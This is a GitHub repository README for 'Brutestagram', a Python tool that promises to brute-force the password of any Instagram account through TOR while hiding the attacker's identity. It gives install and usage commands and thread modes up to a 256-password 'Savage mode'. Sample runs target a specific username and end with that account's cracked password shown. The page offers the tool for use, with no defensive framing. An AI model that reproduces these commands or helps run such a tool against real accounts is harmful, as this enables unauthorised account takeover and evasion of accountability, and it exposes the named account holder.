Skip to content

m4xx101/Brutestagram

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Brutestagram


This program will brute force any Instagram account you send it its way. Just give it a target, a password list and a mode then press enter and forget about it. No need to worry about anonymity when using this program, its highest priority is your anonymity, it only attacks when your identity is hidden.

Requirements

  • Python v2.7.x | v3.x.x
  • Kali Linux 2.0
  • TOR

Install Dependencies

python install.py

Help

root@m4xx:~#python instagram.py -h
usage: instagram.py [-h] [-m MODE] username wordlist

positional arguments:
  username              email or username
  wordlist              password list

optional arguments:
  -h, --help            show this help message and exit
  -m MODE, --mode MODE  modes: 0 => 16 bots; 1 => 8 bots; 2 => 4 bots; 3 => 2 bots

Usage

python instagram.py <username> <wordlist> -m <mode>

Bots(Threads)

  • 2 bots: 32 passwords at a time
  • 4 bots: 64 passwords at a time
  • 8 bots: 128 passwords at a time
  • 16 bots: 256 passwords at a time

Modes

  • 0: 16 bots
  • 1: 8 bots
  • 2: 4 bots
  • 3: 2 bots

Chill mode

This mode uses only 2 bots, or 32 passwords at a time.

root@m4xx:~#python instagram.py Sami09.1 pass.lst -m 3

Moderate mode 1

This mode uses 4 bots, or 64 passwords at a time.

root@m4xx:~#python instagram.py Sami09.1 pass.lst -m 2

Moderate mode 2

This mode uses 8 bots, or 128 passwords at a time.

root@m4xx:~#python instagram.py Sami09.1 pass.lst -m 1

Savage mode

This mode uses 16 bots, or 256 passwords at a time.

root@m4xx:~#python instagram.py Sami09.1 pass.lst -m 0

If you don't specify a mode, then mode is set to 2

Run

[-] Wordlist: pass.lst
[-] Username: Sami09.1
[-] Password: 2
[-] Attempts: 14
[-] Browsers: 87

Stop

[-] Wordlist: pass.lst
[-] Username: Sami09.1
[-] Password: Sami123
[-] Attempts: 101
[-] Browsers: 0

[!] Password Found
[+] Username: Sami09.1
[+] Password: Sami123

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages